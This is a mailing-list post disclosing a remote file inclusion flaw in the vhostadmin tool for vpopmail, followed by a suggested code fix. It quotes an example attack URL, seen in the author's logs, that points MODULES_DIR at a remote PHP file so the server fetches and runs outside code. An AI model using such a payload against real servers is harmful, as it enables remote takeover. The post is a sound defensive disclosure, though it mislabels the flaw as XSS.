I know this is not exactly vpopmail related, but as its a vpopmail
related tool i thought others here would like to be made aware of this.

I have been using vhostadmin for a while now, and have just noticed that
it is vulnerable to a xss attack which could lead to the underlying
system being cracked. The problem is the $MODULES_DIR var is not being
protected against injection of a remote path and simply accepts whatever
is passed to it such as

http://server/path/to/vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d


A quick fix is to change global.inc and change 
$MODULES_DIR = 'modules';
to
define("MODULES_DIR", "modules");

and then change all references in any file it appears in of 

$MODULES_DIR 
to 
MODULES_DIR 

and comment out any references to 

global $MODULES_DIR;
to
//global $MODULES_DIR;


There may be other issues, but this one I came accross yesterday when I
noticed the above formated url in the apacge logs. Also, we have
modified some of the system ourselves, so it is entirely possible that
we may be partly to blame for some or all of this, but it would
certainly be worth watching out for if you are using the system.

Regards
Shane

Reply via email to